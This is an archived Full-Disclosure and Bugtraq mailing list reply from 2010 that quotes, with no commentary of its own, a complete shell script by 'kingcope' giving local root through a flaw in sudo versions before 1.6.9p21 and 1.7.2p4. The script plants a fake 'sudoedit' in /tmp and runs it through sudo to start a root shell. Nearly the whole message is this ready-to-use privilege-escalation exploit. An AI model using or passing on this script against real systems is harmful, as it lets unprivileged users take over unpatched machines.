| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <4B8C5203.1010901@fibertel.com.ar> Date: Mon, 01 Mar 2010 20:47:15 -0300 From: root <root_@...ertel.com.ar> To: unlisted-recipients:; (no To-header on input) Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com Subject: Re: Todd Miller Sudo local root exploit discovered by Slouching Malisimo Kingcope wrote: > Just for the record. > > ---snip--- > #!/bin/sh > # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 > # local root exploit > # March 2010 > # automated by kingcope > # Full Credits to Slouching > echo Tod Miller Sudo local root exploit > echo by Slouching > echo automated by kingcope > if [ $# != 1 ] > then > echo "usage: ./sudoxpl.sh <file you have permission to edit>" > exit > fi > cd /tmp > cat > sudoedit << _EOF > #!/bin/sh > echo ALEX-ALEX > su > /bin/su > /usr/bin/su > _EOF > chmod a+x ./sudoedit > sudo ./sudoedit $1 > --snip--- > > cheers, > kingcope > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists